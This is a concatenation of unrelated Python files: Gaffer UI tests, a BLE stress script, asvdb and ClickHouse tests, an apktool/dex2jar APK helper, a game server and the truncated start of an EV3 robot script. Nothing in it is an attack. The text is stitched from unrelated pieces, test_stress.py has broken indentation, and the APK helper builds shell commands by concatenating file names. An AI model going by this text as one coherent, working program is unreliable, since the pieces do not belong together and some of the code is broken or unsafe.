        self.assertIsInstance( ng1, GafferUI.StandardNodeGadget )
        self.assertIsInstance( ng2, GafferUI.StandardNodeGadget )
        self.assertIsInstance( c, GafferUI.StandardConnectionGadget )
        self.assertTrue( c.srcNodule().isSame( ng1.nodule( s["n1"]["sum"] ) ) )
        self.assertTrue( c.dstNodule().isSame( ng2.nodule( s["n2"]["op1"] ) ) )
    assertBothVisible()
    # Hide n1 : its gadget disappears and the connection dangles.
    Gaffer.Metadata.registerValue( s["n1"], "nodeGadget:type", "" )
    def assertN1Hidden() :
        ng2 = g.nodeGadget( s["n2"] )
        c = g.connectionGadget( s["n2"]["op1"] )
        self.assertIsNone( g.nodeGadget( s["n1"] ) )
        self.assertIsInstance( ng2, GafferUI.StandardNodeGadget )
        self.assertIsInstance( c, GafferUI.StandardConnectionGadget )
        self.assertIsNone( c.srcNodule() )
        self.assertTrue( c.dstNodule().isSame( ng2.nodule( s["n2"]["op1"] ) ) )
    assertN1Hidden()
    # Hide n2 as well : gadget and connection disappear entirely.
    Gaffer.Metadata.registerValue( s["n2"], "nodeGadget:type", "" )
    def assertBothHidden() :
        self.assertIsNone( g.nodeGadget( s["n1"] ) )
        self.assertIsNone( g.nodeGadget( s["n2"] ) )
        self.assertIsNone( g.connectionGadget( s["n2"]["op1"] ) )
    assertBothHidden()
    # Restoring the standard gadget type brings everything back.
    Gaffer.Metadata.registerValue( s["n2"], "nodeGadget:type", "GafferUI::StandardNodeGadget" )
    assertN1Hidden()
    Gaffer.Metadata.registerValue( s["n1"], "nodeGadget:type", "GafferUI::StandardNodeGadget" )
    assertBothVisible()
def testConnectionGadgetsIncludesDanglingConnections( self ) :
	"""connectionGadgets() must also report connections whose source nodule is
	not drawn (here : a child component of a compound plug whose children are
	only visible on the destination side)."""

	s = Gaffer.ScriptNode()

	s["n1"] = Gaffer.Node()
	s["n1"]["c"] = Gaffer.Color3fPlug( direction = Gaffer.Plug.Direction.Out, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )

	s["n2"] = Gaffer.Node()
	s["n2"]["c"] = Gaffer.Color3fPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
	s["n2"]["c"]["r"].setInput( s["n1"]["c"]["r"] )

	# Only the destination side exposes per-channel nodules.
	Gaffer.Metadata.registerValue( s["n2"]["c"], "compoundNumericNodule:childrenVisible", True )

	g = GafferUI.GraphGadget( s )

	c = g.connectionGadgets( s["n2"]["c"]["r"] )
	self.assertEqual( len( c ), 1 )
	self.assertEqual( c[0].dstNodule(), g.nodeGadget( s["n2"] ).nodule( s["n2"]["c"]["r"] ) )
	# The source end dangles because n1 has no nodule for the channel.
	self.assertIsNone( c[0].srcNodule() )
def testChangeNodeGadgetForUnviewedNode( self ) :
	"""Metadata changes on a node inside an unviewed Box must not create a
	gadget in the parent graph."""

	s = Gaffer.ScriptNode()
	s["b"] = Gaffer.Box()
	s["b"]["n"] = Gaffer.Node()

	g = GafferUI.GraphGadget( s )
	self.assertIsNotNone( g.nodeGadget( s["b"] ) )
	self.assertIsNone( g.nodeGadget( s["b"]["n"] ) )

	# Changing the gadget type of the nested node must still yield no gadget,
	# because the node is not in the viewed graph.
	Gaffer.Metadata.registerValue( s["b"]["n"], "nodeGadget:type", "GafferUI::AuxiliaryNodeGadget" )
	self.assertIsNone( g.nodeGadget( s["b"]["n"] ) )
# Allow running this test module directly.
if __name__ == "__main__":
	unittest.main()
|
test_stress.py | #!/usr/bin/python
from __future__ import absolute_import, print_function, unicode_literals
from optparse import OptionParser, make_option
import dbus
import time
import dbus.mainloop.glib
import bleAdapter
try:
from gi.repository import GObject
except ImportError:
import gobject as GObject
import testutils
import startTests_stress as startTests
import threading
import securityAgent
devices = {}
def backGroundEvents():
    """Run a GLib main loop on a background thread so D-Bus signals are
    delivered; exits cleanly on KeyboardInterrupt.

    FIX: the loop is now created *before* the try block — previously a
    KeyboardInterrupt raised during construction reached `mainloop.quit()`
    with `mainloop` still unbound, turning the interrupt into a NameError.
    """
    mainloop = GObject.MainLoop()
    try:
        mainloop.run()
    except KeyboardInterrupt:
        mainloop.quit()
        print("Thread: KeyboardInterrupt")
        return
if __name__ == '__main__':
    # GLib/D-Bus main-loop integration must be installed before any bus
    # objects are created.
    dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
    # Start from a clean slate: forget previously bonded peers.
    testutils.removeBondedDevices()
    #startBackGroundEvents = threading.Thread(target=backGroundEvents)
    #startBackGroundEvents.start()
    startTests.main()
|
test_asvdb.py | from os import path
import tempfile
import json
import threading
import time
import pytest
# Canned fixture data shared by all tests below.
datasetName = "dolphins.csv"
# (algorithm name, runtime in seconds); the trailing None exercises a result
# without a value — presumably a "did not run" marker, verify against asvdb.
algoRunResults = [('loadDataFile', 3.2228727098554373),
                  ('createGraph', 3.00713360495865345),
                  ('pagerank', 3.00899268127977848),
                  ('bfs', 3.004273353144526482),
                  ('sssp', 3.004624705761671066),
                  ('jaccard', 3.0025573652237653732),
                  ('louvain', 3.32631026208400726),
                  ('weakly_connected_components', 3.0034315641969442368),
                  ('overlap', 3.002147899940609932),
                  ('triangles', 3.2544921860098839),
                  ('spectralBalancedCutClustering', 3.03329935669898987),
                  ('spectralModularityMaximizationClustering', 3.011258183047175407),
                  ('renumber', 3.001620553433895111),
                  ('view_adj_list', 3.000927431508898735),
                  ('degree', 3.0016251634806394577),
                  ('degrees', None)]
# Repo / commit metadata used when building BenchmarkInfo objects.
repo = "myrepo"
branch = "my_branch"
commitHash = "809a1569e8a2ff138cdde4d9c282328be9dcad43"
commitTime = 1590007324
machineName = "my_machine"
def createAndPopulateASVDb(dbDir):
    """Create an ASVDb in *dbDir* with one canned BenchmarkInfo and the
    standard set of results; return the populated db."""
    from asvdb import ASVDb, BenchmarkInfo

    database = ASVDb(dbDir, repo, [branch])
    info = BenchmarkInfo(
        machineName=machineName,
        cudaVer="9.2",
        osType="linux",
        pythonVer="3.6",
        commitHash=commitHash,
        commitTime=commitTime,
        branch=branch,
        gpuType="n/a",
        cpuType="x86_64",
        arch="my_arch",
        ram="123456",
    )
    return addResultsForInfo(database, info)
def addResultsForInfo(db, bInfo):
    """Add one BenchmarkResult per (algoName, exeTime) pair in algoRunResults
    to *db* under *bInfo*; return *db* for chaining.

    FIX: dropped the unused `ASVDb` name from the local import.
    """
    from asvdb import BenchmarkResult

    for (algoName, exeTime) in algoRunResults:
        bResult = BenchmarkResult(funcName=algoName,
                                  argNameValuePairs=[("dataset", datasetName)],
                                  result=exeTime)
        db.addResult(bInfo, bResult)
    return db
def test_addResult():
    """Smoke test: creating and populating a db in a temp dir must not raise."""
    with tempfile.TemporaryDirectory() as dirName:
        createAndPopulateASVDb(dirName)
def test_addResults():
    """addResults() must persist a whole batch that reads back identically."""
    from asvdb import ASVDb, BenchmarkInfo, BenchmarkResult

    asvDir = tempfile.TemporaryDirectory()
    dbDir = asvDir.name
    db = ASVDb(dbDir, repo, [branch])
    bInfo = BenchmarkInfo(machineName=machineName,
                          cudaVer="9.2",
                          osType="linux",
                          pythonVer="3.6",
                          commitHash=commitHash,
                          commitTime=commitTime,
                          branch=branch,
                          gpuType="n/a",
                          cpuType="x86_64",
                          arch="my_arch",
                          ram="123456")
    batch = [
        BenchmarkResult(funcName=name,
                        argNameValuePairs=[("dataset", datasetName)],
                        result=seconds)
        for (name, seconds) in algoRunResults
    ]
    db.addResults(bInfo, batch)

    # Read back with a fresh instance and compare against what was written.
    readBack = ASVDb(dbDir, repo, [branch]).getResults()
    assert len(readBack) == 1
    assert readBack[0][0] == bInfo
    assert len(readBack[0][1]) == len(algoRunResults)
    assert batch == readBack[0][1]

    asvDir.cleanup()
def test_writeWithoutRepoSet():
    """updateConfFile() must raise AttributeError when no repo was given.

    FIX: the temporary directory is now cleaned up explicitly, consistent
    with the other tests in this module.
    """
    from asvdb import ASVDb

    tmpDir = tempfile.TemporaryDirectory()
    asvDirName = path.join(tmpDir.name, "dir_that_does_not_exist")
    db1 = ASVDb(asvDirName)
    with pytest.raises(AttributeError):
        db1.updateConfFile()
    tmpDir.cleanup()
def test_asvDirDNE():
    """ASVDb must create a missing asv dir and write its branches into
    asv.conf.json."""
    from asvdb import ASVDb

    tmpDir = tempfile.TemporaryDirectory()
    missingDir = path.join(tmpDir.name, "dir_that_does_not_exist")
    repo = "somerepo"
    branch1 = "branch1"

    database = ASVDb(missingDir, repo, [branch1])
    database.updateConfFile()

    with open(path.join(missingDir, "asv.conf.json")) as fobj:
        conf = json.load(fobj)
    assert conf["branches"] == [branch1]

    tmpDir.cleanup()
def test_newBranch():
    """A second ASVDb over the same dir must append its branch to the conf file."""
    from asvdb import ASVDb

    asvDir = tempfile.TemporaryDirectory()
    repo = "somerepo"
    branch1 = "branch1"
    branch2 = "branch2"

    # Two writers, each declaring a different branch.
    ASVDb(asvDir.name, repo, [branch1]).updateConfFile()
    ASVDb(asvDir.name, repo, [branch2]).updateConfFile()

    with open(path.join(asvDir.name, "asv.conf.json")) as fobj:
        conf = json.load(fobj)
    assert conf["branches"] == [branch1, branch2]

    asvDir.cleanup()
def test_gitExtension():
    """The repo URL written to the conf file must end in .git."""
    from asvdb import ASVDb

    asvDir = tempfile.TemporaryDirectory()
    ASVDb(asvDir.name, "somerepo", ["branch1"]).updateConfFile()

    with open(path.join(asvDir.name, "asv.conf.json")) as fobj:
        conf = json.load(fobj)
    assert conf["repo"].endswith(".git")

    asvDir.cleanup()
def test_concurrency():
    """Three ASVDb instances writing to the same (initially missing) dir must
    serialize through the db's locking: db3 stays blocked while db1/db2 hold
    the lock (artificially slowed by writeDelay), and completes once both are
    cancelled."""
    from asvdb import ASVDb, BenchmarkInfo, BenchmarkResult

    tmpDir = tempfile.TemporaryDirectory()
    asvDirName = path.join(tmpDir.name, "dir_that_does_not_exist")
    repo = "somerepo"
    branch1 = "branch1"

    db1 = ASVDb(asvDirName, repo, [branch1])
    db2 = ASVDb(asvDirName, repo, [branch1])
    db3 = ASVDb(asvDirName, repo, [branch1])
    # Use the writeDelay member var to insert a delay during write to properly
    # test collisions by making writes slow.
    db1.writeDelay = 10
    db2.writeDelay = 10

    bInfo = BenchmarkInfo()
    bResult1 = BenchmarkResult(funcName="somebenchmark1", result=43)
    bResult2 = BenchmarkResult(funcName="somebenchmark2", result=43)
    bResult3 = BenchmarkResult(funcName="somebenchmark3", result=43)

    # db1 or db2 should be actively writing the result (because the writeDelay is long)
    # and db3 should be blocked.
    t1 = threading.Thread(target=db1.addResult, args=(bInfo, bResult1))
    t2 = threading.Thread(target=db2.addResult, args=(bInfo, bResult2))
    t3 = threading.Thread(target=db3.addResult, args=(bInfo, bResult3))

    t1.start()
    t2.start()
    time.sleep(0.5)  # ensure t3 tries to write last
    t3.start()

    # Check that db3 is blocked - if locking wasn't working, it would have
    # finished since it has no writeDelay.
    t3.join(timeout=0.5)
    assert t3.is_alive() is True

    # Cancel db1 and db2, allowing db3 to write and finish
    db1.cancelWrite = True
    db2.cancelWrite = True
    t3.join(timeout=11)
    assert t3.is_alive() is False

    t1.join()
    t2.join()
    t3.join()

    # Check that db3 wrote its result
    with open(path.join(asvDirName, "results", "benchmarks.json")) as fobj:
        jo = json.load(fobj)
        assert "somebenchmark3" in jo
        #print(jo)

    tmpDir.cleanup()
def test_concurrency_stress():
    """32 ASVDb instances, each with a small writeDelay, add one result each
    concurrently; every result must survive the contention and be readable
    from any single instance."""
    from asvdb import ASVDb, BenchmarkInfo, BenchmarkResult

    tmpDir = tempfile.TemporaryDirectory()
    asvDirName = path.join(tmpDir.name, "dir_that_does_not_exist")
    repo = "somerepo"
    branch1 = "branch1"

    num = 32
    dbs = []
    threads = []
    allFuncNames = []
    bInfo = BenchmarkInfo(machineName=machineName)
    for i in range(num):
        db = ASVDb(asvDirName, repo, [branch1])
        db.writeDelay=0.5
        dbs.append(db)
        funcName = f"somebenchmark{i}"
        bResult = BenchmarkResult(funcName=funcName, result=43)
        allFuncNames.append(funcName)
        t = threading.Thread(target=db.addResult, args=(bInfo, bResult))
        threads.append(t)

    for i in range(num):
        threads[i].start()
    for i in range(num):
        threads[i].join()

    # There should be num unique results in the db after (re)reading. Pick any
    # of the db instances to read, they should all see the same results.
    results = dbs[0].getResults()
    assert len(results[0][1]) == num

    # Simply check that all unique func names were read back in.
    allFuncNamesCheck = [r.funcName for r in results[0][1]]
    assert sorted(allFuncNames) == sorted(allFuncNamesCheck)

    tmpDir.cleanup()
def test_read():
    """A freshly-populated db must read back repo, branches, info and results
    intact.

    FIX: the temporary directory was never cleaned up, unlike the sibling
    tests; an explicit cleanup() is now done at the end.
    """
    from asvdb import ASVDb

    tmpDir = tempfile.TemporaryDirectory()
    asvDirName = path.join(tmpDir.name, "dir_that_did_not_exist_before")
    createAndPopulateASVDb(asvDirName)

    db1 = ASVDb(asvDirName)
    db1.loadConfFile()
    # asvdb always ensures repos end in .git
    assert db1.repo == f"{repo}.git"
    assert db1.branches == [branch]

    # getInfo() returns a list of BenchmarkInfo objs
    biList = db1.getInfo()
    assert len(biList) == 1
    bi = biList[0]
    assert bi.machineName == machineName
    assert bi.commitHash == commitHash
    assert bi.commitTime == commitTime
    assert bi.branch == branch

    # getResults() returns a list of tuples:
    # (BenchmarkInfo obj, [BenchmarkResult obj, ...])
    brList = db1.getResults()
    assert len(brList) == len(biList)
    assert brList[0][0] == bi
    results = brList[0][1]
    assert len(results) == len(algoRunResults)
    br = results[0]
    assert br.funcName == algoRunResults[0][0]
    assert br.argNameValuePairs == [("dataset", datasetName)]
    assert br.result == algoRunResults[0][1]

    tmpDir.cleanup()
def test_getFilteredResults():
    """getResults(filterInfoObjList=...) must return only the results belonging
    to the requested BenchmarkInfo objects.

    FIX: the temporary directory was never cleaned up; an explicit cleanup()
    is now done at the end, consistent with the sibling tests.
    """
    from asvdb import ASVDb, BenchmarkInfo

    tmpDir = tempfile.TemporaryDirectory()
    asvDirName = path.join(tmpDir.name, "dir_that_did_not_exist_before")
    db = ASVDb(asvDirName, repo, [branch])

    # Three distinct environments sharing the same commit.
    bInfo1 = BenchmarkInfo(machineName=machineName,
                           cudaVer="9.2",
                           osType="linux",
                           pythonVer="3.6",
                           commitHash=commitHash,
                           commitTime=commitTime)
    bInfo2 = BenchmarkInfo(machineName=machineName,
                           cudaVer="10.1",
                           osType="linux",
                           pythonVer="3.7",
                           commitHash=commitHash,
                           commitTime=commitTime)
    bInfo3 = BenchmarkInfo(machineName=machineName,
                           cudaVer="10.0",
                           osType="linux",
                           pythonVer="3.7",
                           commitHash=commitHash,
                           commitTime=commitTime)

    addResultsForInfo(db, bInfo1)
    addResultsForInfo(db, bInfo2)
    addResultsForInfo(db, bInfo3)

    # should only return results associated with bInfo1
    brList1 = db.getResults(filterInfoObjList=[bInfo1])
    assert len(brList1) == 1
    assert brList1[0][0] == bInfo1
    assert len(brList1[0][1]) == len(algoRunResults)

    # should only return results associated with bInfo1 or bInfo3
    brList1 = db.getResults(filterInfoObjList=[bInfo1, bInfo3])
    assert len(brList1) == 2
    assert brList1[0][0] in [bInfo1, bInfo3]
    assert brList1[1][0] in [bInfo1, bInfo3]
    assert brList1[0][0] != brList1[1][0]
    assert len(brList1[0][1]) == len(algoRunResults)
    assert len(brList1[1][1]) == len(algoRunResults)

    tmpDir.cleanup()
|
test.py | import time
import threading
import random
from collections import Counter
import pytest
from helpers.cluster import ClickHouseCluster
# Two-replica cluster; both nodes join the same ZooKeeper-backed
# ReplicatedMergeTree table created in the started_cluster fixture.
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1', with_zookeeper=True)
node2 = cluster.add_instance('node2', with_zookeeper=True)
nodes = [node1, node2]
@pytest.fixture(scope="module")
def started_cluster():
    """Start the cluster, (re)create test_mutations on every replica, and
    shut everything down when the module's tests are done."""
    try:
        cluster.start()

        # Drop any leftover table on all replicas first, then create fresh.
        for replica in nodes:
            replica.query("DROP TABLE IF EXISTS test_mutations")
        for replica in nodes:
            replica.query("CREATE TABLE test_mutations(d Date, x UInt32, i UInt32) ENGINE ReplicatedMergeTree('/clickhouse/tables/test/test_mutations', '{instance}') ORDER BY x PARTITION BY toYYYYMM(d)")

        yield cluster
    finally:
        cluster.shutdown()
class Runner:
    """Drives concurrent INSERTs and ALTER DELETE mutations against the
    replicated test_mutations table, keeping mutex-protected totals so the
    test can verify convergence afterwards.

    FIX: Python-2-only syntax (`print` statements, `except Exception, e`)
    replaced with forms valid on both Python 2 and 3.
    """

    def __init__(self):
        self.mtx = threading.Lock()  # guards every counter below
        self.total_inserted_xs = 0
        self.total_inserted_rows = 0
        self.total_mutations = 0
        self.total_deleted_xs = 0
        self.total_deleted_rows = 0
        self.current_xs = Counter()            # x values currently in the table
        self.currently_inserting_xs = Counter()  # x values with in-flight inserts
        self.currently_deleting_xs = set()       # x values with in-flight deletes
        self.stop_ev = threading.Event()

    def do_insert(self, thread_num):
        self.stop_ev.wait(random.random())

        # Each thread inserts a small random number of rows with random year, month 01 and day determined
        # by the thread number. The idea is to avoid spurious duplicates and to insert into a
        # nontrivial number of partitions.
        month = '01'
        day = str(thread_num + 1).zfill(2)
        i = 1
        while not self.stop_ev.is_set():
            xs = [random.randint(1, 10) for _ in range(random.randint(1, 10))]
            with self.mtx:
                # Never insert an x that is being deleted right now.
                xs = [x for x in xs if x not in self.currently_deleting_xs]
                if len(xs) == 0:
                    continue
                for x in xs:
                    self.currently_inserting_xs[x] += 1

            year = 2000 + random.randint(0, 10)
            date_str = '{year}-{month}-{day}'.format(year=year, month=month, day=day)
            payload = ''
            for x in xs:
                payload += '{date_str} {x} {i}\n'.format(date_str=date_str, x=x, i=i)
                i += 1

            try:
                print('thread {}: insert for {}: {}'.format(thread_num, date_str, ','.join(str(x) for x in xs)))
                random.choice(nodes).query("INSERT INTO test_mutations FORMAT TSV", payload)

                with self.mtx:
                    for x in xs:
                        self.current_xs[x] += 1
                    self.total_inserted_xs += sum(xs)
                    self.total_inserted_rows += len(xs)
            except Exception as e:
                print('Exception while inserting, {}'.format(e))
            finally:
                with self.mtx:
                    for x in xs:
                        self.currently_inserting_xs[x] -= 1

            self.stop_ev.wait(0.2 + random.random() / 5)

    def do_delete(self, thread_num):
        self.stop_ev.wait(1.0 + random.random())

        while not self.stop_ev.is_set():
            chosen = False
            with self.mtx:
                if self.current_xs:
                    x = random.choice(list(self.current_xs.elements()))

                    # Only delete an x that nobody is inserting or deleting.
                    if self.currently_inserting_xs[x] == 0 and x not in self.currently_deleting_xs:
                        chosen = True
                        self.currently_deleting_xs.add(x)
                        to_delete_count = self.current_xs[x]

            if not chosen:
                self.stop_ev.wait(0.1 * random.random())
                continue

            try:
                print('thread {}: delete {} * {}'.format(thread_num, to_delete_count, x))
                random.choice(nodes).query("ALTER TABLE test_mutations DELETE WHERE x = {}".format(x))

                with self.mtx:
                    self.total_mutations += 1
                    self.current_xs[x] -= to_delete_count
                    self.total_deleted_xs += to_delete_count * x
                    self.total_deleted_rows += to_delete_count
            except Exception as e:
                print('Exception while deleting, {}'.format(e))
            finally:
                with self.mtx:
                    self.currently_deleting_xs.remove(x)

            self.stop_ev.wait(1.0 + random.random() * 2)
def test_mutations(started_cluster):
    """Run concurrent inserts and DELETE mutations for a while, then verify
    every replica converges to the same, consistent sum.

    FIX: the Python-2-only `print` statement replaced with the function form.
    """
    DURATION_SECONDS = 50

    runner = Runner()

    threads = []
    for thread_num in range(5):
        threads.append(threading.Thread(target=runner.do_insert, args=(thread_num, )))
    # Delete threads get distinct numbers too so logs are distinguishable.
    for thread_num in (11, 12, 13):
        threads.append(threading.Thread(target=runner.do_delete, args=(thread_num,)))

    for t in threads:
        t.start()
    time.sleep(DURATION_SECONDS)
    runner.stop_ev.set()
    for t in threads:
        t.join()

    # Sanity check: at least something was inserted and something was deleted
    assert runner.total_inserted_rows > 0
    assert runner.total_mutations > 0

    all_done = False
    for i in range(100):  # wait for replication 10 seconds max
        time.sleep(0.1)

        def get_done_mutations(node):
            return int(node.query("SELECT sum(is_done) FROM system.mutations WHERE table = 'test_mutations'").rstrip())

        if all([get_done_mutations(n) == runner.total_mutations for n in nodes]):
            all_done = True
            break

    # Dump mutation state for debugging before the final assertion.
    print(node1.query("SELECT mutation_id, command, parts_to_do, is_done FROM system.mutations WHERE table = 'test_mutations' FORMAT TSVWithNames"))
    assert all_done

    expected_sum = runner.total_inserted_xs - runner.total_deleted_xs
    actual_sums = []
    for i, node in enumerate(nodes):
        actual_sums.append(int(node.query("SELECT sum(x) FROM test_mutations").rstrip()))
        assert actual_sums[i] == expected_sum
|
ApkParser.py | #!/usr/bin/env python
#-*-coding:utf-8-*-
import sys
import subprocess
import threading
import os
import shutil
import time
class Parser(object):
    """Drives apktool + dex2jar: decompiles an APK, rebuilds it, converts its
    classes*.dex files to jars and collects everything in a timestamped
    output directory.

    FIX: Python-2-only `print` statements replaced with the function form,
    valid on both Python 2 and 3.
    """

    def __init__(self, path):
        # NOTE: this assignment deliberately shadows the current_path() method
        # with its string result; the method is only callable before this line.
        self.current_path = self.current_path()
        self.output = self.current_path + "/output-" + str(time.time())
        self.apk_path = path[1]  # `path` is sys.argv, so [1] is the APK path
        self.dex_to_jar_path = self.get_dex_to_jar_path()
        self.apk_name = self.parseName(self.apk_path)
        self.parent_path = os.path.dirname(self.apk_path)
        self.process = None

    def get_dex_to_jar_path(self):
        # Fragile: expects the dex2jar path as "key=value" on line 4 of
        # Config.py — TODO: import Config instead of parsing it by line index.
        with open(self.current_path + "/Config.py") as f:
            return f.readlines()[3].split("=")[1].strip()

    def current_path(self):
        """Absolute directory containing this script."""
        return os.path.normpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))

    def parseName(self, apk_path):
        """Return the APK base name without directories or extension."""
        splittable = apk_path.split('/')
        full_apk_name = splittable[len(splittable) - 1]
        return full_apk_name.split('.')[0]

    def copyApk(self):
        shutil.move(self.apk_path, self.dex_to_jar_path)

    def changeEnv(self):
        os.chdir(self.dex_to_jar_path)

    def decompile(self):
        """Run `apktool d` on the APK (in a worker thread, joined immediately)."""
        print('.....decompile started.....')

        def doDecompile():
            apktool_cmd = "apktool d " + self.apk_name + ".apk"
            self.process = subprocess.Popen(apktool_cmd, shell=True)
            self.process.communicate()

        thread = threading.Thread(target=doDecompile)
        thread.start()
        thread.join()
        print('.....decompile finished.....')

    def recompile(self):
        """Run `apktool b` to rebuild the decompiled APK."""
        print('.....recompile started.....')

        def doRecompile():
            apktool_cmd = "apktool b " + self.apk_name
            self.process = subprocess.Popen(apktool_cmd, shell=True)
            self.process.communicate()

        thread = threading.Thread(target=doRecompile)
        thread.start()
        thread.join()
        print('.....recompile finished.....')

    def dex_to_jar(self):
        """Convert every classes*.dex in the rebuilt APK to a jar via d2j-dex2jar."""
        print('.....dex2jar started.....')
        dest = self.apk_name + "/build/apk/"
        for filename in os.listdir(dest):
            # str.find() returns 0 for a prefix match, so `not find(...)`
            # selects files whose name starts with "classes".
            if not filename.find("classes"):
                def doDex_to_jar():
                    cmd = "./d2j-dex2jar.sh " + self.apk_name + "/build/apk/" + filename
                    self.process = subprocess.Popen(cmd, shell=True)
                    self.process.communicate()

                thread = threading.Thread(target=doDex_to_jar)
                thread.start()
                thread.join()
        print('.....dex2jar finished.....')

    def createDir(self):
        os.mkdir(self.output)

    def restoreFile(self):
        """Move the decompiled tree and generated jars into the output dir."""
        shutil.move(self.apk_name, self.output)
        for dex in os.listdir(self.dex_to_jar_path):
            if not dex.find("classes"):
                shutil.move(dex, self.output)

    def removeTempApk(self):
        """Move the APK back from the working dir to its original location."""
        removalPath = self.dex_to_jar_path + "/" + self.apk_name + ".apk"
        shutil.move(removalPath, self.apk_path)

    def run(self):
        """Full pipeline: move APK in, decompile, rebuild, dex2jar, collect output."""
        self.copyApk()
        self.changeEnv()
        self.decompile()
        self.recompile()
        self.dex_to_jar()
        self.createDir()
        self.restoreFile()
        self.removeTempApk()
def parse():
    """Entry point: build a Parser from the command line and run the pipeline."""
    Parser(sys.argv).run()


if __name__ == "__main__":
    parse()
Application_server.py | from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import pyqtSlot
from threading import Thread
from Classes import Server
import json
import time
class Application_server(QApplication):
    """Qt application hosting the game server: reacts to game-over and
    bomb-placement signals and broadcasts resulting state to all clients.

    FIX: in set_bomb_thread a `for i in ...` loop clobbered the bomb's x
    coordinate `i`, corrupting the BOMB_POS sent in the BOMB_BLOW payload;
    the loop variable is renamed. Comments translated to English.
    """

    def __init__(self, *agrs, **kwargs):
        super(Application_server, self).__init__(*agrs, **kwargs)
        self.server = None  # set later by setup_server()

    @pyqtSlot(bool, int, int)
    def game_over_response(self, value, player_id, place):
        """Record a player's final place, notify clients and the DB, and
        announce a winner once only one player remains."""
        if value:
            self.server.set_place_to_player(player_id, place)
            print("GAME OVER ")
            print(self.server.info_about_players)
            self.server.send_info_to_client_game_over(self.server.info_about_players, player_id)
            self.server.send_info_to_db(self.server.info_about_players)
            answer = self.server.game_state.how_many_players_left()
            print("players left ", answer)
            if answer == 1:
                id_winner = self.server.game_state.get_winner_id()
                self.server.send_info_to_client_winner(self.server.info_about_players, id_winner)

    def set_bomb_thread(self, addr, data):
        """Handle one bomb end-to-end: place it, broadcast it, wait out the
        fuse, compute the blast, broadcast destruction/deaths, and refresh
        the server-side board."""
        player_id = self.server.get_player_id(addr)
        answer = self.server.game_state.player_can_leave_bomb(player_id)
        if answer is True:
            self.server.add_bomb_to_player(player_id)
            # (i, j) are the bomb's board coordinates; they are reused below in
            # the BOMB_BLOW payload, so no loop may overwrite them.
            i, j = self.server.game_state.set_bomb(addr, data, player_id)
            payload = {"type": "BOMB", "BOMB_POS": {"x": i, "y": j}, "whose_bomb": player_id}
            for key, value in self.server.dict_players.items():
                self.server.s.sendto(json.dumps(payload).encode("utf-8"), value)
            time.sleep(2)
            # Bomb explosion: from this message on, the clients play the blast effects.
            range_of_bomb = self.server.game_state.get_range_of_bomb(player_id)
            self.server.game_state.count_where_blow(i, j, range_of_bomb)
            # After the blast, work out who died.
            list_dead_players = self.server.game_state.handle_bombs(j, i, self.server.game_state.list_to_destroy)
            if list_dead_players == []:
                x_player, y_player = self.server.game_state.get_player_pos(player_id)
                # BUG FIX: this loop previously used `i` as its variable,
                # clobbering the bomb's x coordinate used in the payload below.
                for cell in self.server.game_state.list_to_destroy:
                    if cell[0] == x_player and cell[1] == y_player:
                        list_dead_players.append(player_id)
            payload = {"type": "BOMB_BLOW", "BOMB_POS": {"x": i, "y": j},
                       "ELEMENTS_BLOW": self.server.game_state.list_to_destroy}
            for key, value in self.server.dict_players.items():
                self.server.s.sendto(json.dumps(payload).encode("utf-8"), value)
            # Refresh the server's own copy of the game board.
            for k in self.server.game_state.list_to_destroy:
                if self.server.game_state.game[k[1]][k[0]] != 0:
                    if self.server.game_state.game[k[1]][k[0]].desc == "bomb" or self.server.game_state.game[k[1]][
                            k[0]].desc == "brick":
                        self.server.game_state.game[k[1]][k[0]] = 0
                    elif self.server.game_state.game[k[1]][k[0]].desc == "powerup":
                        if self.server.game_state.game[k[1]][k[0]].view == "brick":
                            self.server.game_state.game[k[1]][k[0]].change_view("powerup")
                        else:
                            self.server.game_state.game[k[1]][k[0]] = 0
            if list_dead_players != []:
                self.server.game_state.game_over.emit(True, player_id, self.server.game_state.place)
                self.server.game_state.place -= 1
                dictionary_dead_players = {}
                for k in list_dead_players:
                    dictionary_dead_players[k] = self.server.game_state.get_player_pos(k)
                payload = {"type": "PLAYER_DEAD", "PLAYERS_POS": dictionary_dead_players}
                for key, value in self.server.dict_players.items():
                    self.server.s.sendto(json.dumps(payload).encode("utf-8"), value)
                print("dictionary_dead_players ", dictionary_dead_players)
                self.server.game_state.remove_player_from_map(dictionary_dead_players)
                print("Usunieto gracza z planszy ")
                answer = self.server.game_state.how_many_players_left()
                print(answer)
                if answer == 1:
                    id_winner = self.server.game_state.get_winner_id()
                    self.server.send_info_to_client_winner(self.server.info_about_players, id_winner)

    @pyqtSlot(bool, tuple, str)
    def set_bomb_response(self, value, addr, data):
        """Slot: spawn one worker thread per placed bomb so the fuse sleep
        never blocks the Qt event loop."""
        if value:
            thread = Thread(target=self.set_bomb_thread, args=[addr, data, ])
            thread.start()

    def setup(self):
        """Create the server, connect to clients and start the listener thread."""
        self.setup_server()
        self.server.connectWithClient()
        thread = Thread(target=self.server.listening, args=[])
        thread.start()

    def setup_server(self):
        server = Server.Server()
        self.server = server
|
Main_plaza-volta.py | #!/usr/bin/env python3
#FUNÇÂO PARA TESTE DO PLAZA E VOLTA(ATÉ ACHAR UM BONECO OU CHEGAR NO FINAL DA PISTA)
#SUBSTITUIR OS VALORES NOS LOCAIS INDICADOS
print("Inicializando...", end=' \r')
import time
# from ev3dev.ev3 import *
print("ev3dev.ev3", end=' \r')
from ev3dev2.motor import OUTPUT_A, OUTPUT_B,OUTPUT_C, MoveTank, SpeedPercent, LargeMotor
print("motores importados", end=' \r')
from ev3dev2.sensor.lego import ColorSensor,UltrasonicSensor
from ev3dev2.sensor import INPUT_4, INPUT_2, INPUT_3
print("Sensores importados", end=' \r')
from threading import Thread
from math import sqrt
import pickle
print("threading, math e pickle importados", end=' \r')
time.sleep(1)
print("Importacoes concluidas!", end=' \r')
# GLOBAL STATE DECLARATIONS ------------------------------------------------
rodas = MoveTank(OUTPUT_A, OUTPUT_B)   # left/right drive motors
Mochila = LargeMotor(OUTPUT_C)         # claw ("backpack") motor
quads = []                             # coloured squares seen so far
orientacao = 0                         # current heading relative to the track (degrees)
# Learned mapping colour -> turn direction (90 = right, -90 = left, 0 = straight).
memoria_cor = {'Red': 0,
               'Yellow': -90,
               'Green': 90, }
plaza = False                          # True once the plaza has been found
